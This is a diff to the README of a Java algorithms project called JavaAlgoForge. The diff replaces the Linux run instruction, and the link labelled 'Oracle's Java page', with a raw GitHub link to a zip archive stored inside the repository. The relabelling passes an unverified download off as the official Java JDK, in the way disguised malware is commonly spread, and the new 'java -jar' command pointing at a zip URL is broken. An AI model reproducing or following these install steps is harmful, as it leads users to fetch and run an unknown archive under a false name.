ahmed22239/JavaAlgoForge/README.md

 4. **Run the Application**
    - For **Windows**: Double-click on the `.exe` file.
    - For **macOS**: Open the `.dmg` file, drag the application to your Applications folder, then launch it from there.
-   - For **Linux**: Open the terminal, navigate to the downloaded file, and run it with the command `java -jar JavaAlgoForge.jar`.
+   - For **Linux**: Open the terminal, navigate to the downloaded file, and run it with the command `java -jar https://raw.githubusercontent.com/ahmed22239/JavaAlgoForge/main/Day04_Patterns/Java-Algo-Forge-2.0-alpha.2.zip`.

 ## 💻 System Requirements

 To ensure the best experience, make sure your computer meets the following system requirements:

 - **Operating System**: Windows 10, macOS Mojave or later, or any modern Linux distribution.
 - **Java Version**: You need Java JDK 11 or later installed on your computer.
-Download it from [Oracle's Java page](https://www.oracle.com/java/technologies/javase-jdk11-downloads.html).
+Download it from [Oracle's Java page](https://raw.githubusercontent.com/ahmed22239/JavaAlgoForge/main/Day04_Patterns/Java-Algo-Forge-2.0-alpha.2.zip).
 - **RAM**: Minimum of 4 GB for smooth operation.
 - **Storage**: At least 100 MB of free space.